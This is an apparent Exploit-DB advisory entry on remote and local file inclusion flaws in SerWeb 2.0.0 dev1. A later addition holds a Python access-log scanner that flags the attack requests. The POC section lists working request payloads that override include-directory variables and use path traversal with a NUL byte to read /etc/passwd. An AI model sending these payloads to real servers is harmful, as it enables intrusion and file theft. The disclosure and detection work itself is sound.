vendor: SerWeb
by: Unknown
CVSS: 7.5 HIGH
RFI / LFI
CWE: 22
Product Name: SerWeb
Affected Version From: 2.0.0 dev1 2007-02-20
Affected Version To: 2.0.0 dev1 2007-02-20
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SerWeb <= 2.0.0 dev1 2007-02-20 Multiple RFI / LFI Vulnerabilities

Multiple Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities in SerWeb version 2.0.0 dev1 2007-02-20 allow attackers to include arbitrary files from remote servers or from the local file system, which could lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

Update to a patched version of SerWeb or apply appropriate security measures to prevent file inclusion attacks.

Exploit-DB raw data:

SerWeb <= 2.0.0 dev1 2007-02-20 Multiple RFI / LFI Vulnerabilities
D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/serweb-2.0.0-dev1_2007-02-20.tar.gz
POC:
    /load_lang.php?_SERWEB[configdir]=Shell
    /main_prepend.php?_SERWEB[functionsdir]=Shell
    /load_phplib.php?_PHPLIB[libdir]=Shell
    /js/get_js.php?mod=../../../../../../../etc/passwd%00
    /js/get_js.php?js=../../../../../../../etc/passwd%00

# milw0rm.com [2007-12-06]
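
Added example (not part of the original advisory or of SerWeb): a Python access-log scanner that flags the request shapes listed in the POC, namely query keys that overwrite the _SERWEB / _PHPLIB arrays and traversal sequences or NUL bytes in the mod / js parameters of get_js.php. It goes beyond the five POC lines by matching any _SERWEB[...] or _PHPLIB[...] key and percent-encoded variants; the log format, sample lines, finding labels and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Keys from the advisory's POC: request input overwriting the _SERWEB / _PHPLIB arrays.
OVERRIDE_KEY = re.compile(r"^_(SERWEB|PHPLIB)\[", re.IGNORECASE)
# get_js.php parameters the POC fills with traversal sequences and a NUL byte.
TRAVERSAL_PARAMS = {"mod", "js"}
REQUEST_LINE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

def decode(text, rounds=3):
    """Percent-decode repeatedly so %252e%252e is treated like '..'."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(target):
    """Return the sorted findings for one request target (path?query)."""
    parts = urlsplit(target)
    script = decode(parts.path).rsplit("/", 1)[-1].lower()
    findings = set()
    for pair in filter(None, parts.query.split("&")):
        key, _, value = pair.partition("=")
        key, value = decode(key), decode(value)
        if OVERRIDE_KEY.match(key):
            findings.add("include-path-override")
        if script == "get_js.php" and key in TRAVERSAL_PARAMS:
            if ".." in value or "\x00" in value:
                findings.add("path-traversal")
    return sorted(findings)

def scan(log_lines):
    """Yield (line_number, target, findings) for access-log lines that match."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_LINE.search(line)
        if match and (found := classify(match.group(1))):
            yield number, match.group(1), found

# Constructed sample log (documentation addresses, placeholder values).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /js/get_js.php?mod=core HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2008:10:00:05 +0000] "GET /load_lang.php?_SERWEB%5Bconfigdir%5D=PLACEHOLDER HTTP/1.1" 200 0',
    '192.0.2.11 - - [01/Jan/2008:10:00:09 +0000] "GET /js/get_js.php?js=..%2F..%2Fexample%00 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    print(list(scan(SAMPLE_LOG)))
```

A hit on include-path-override against a SerWeb install is worth reviewing even when the response was an error, since legitimate clients have no reason to send those keys.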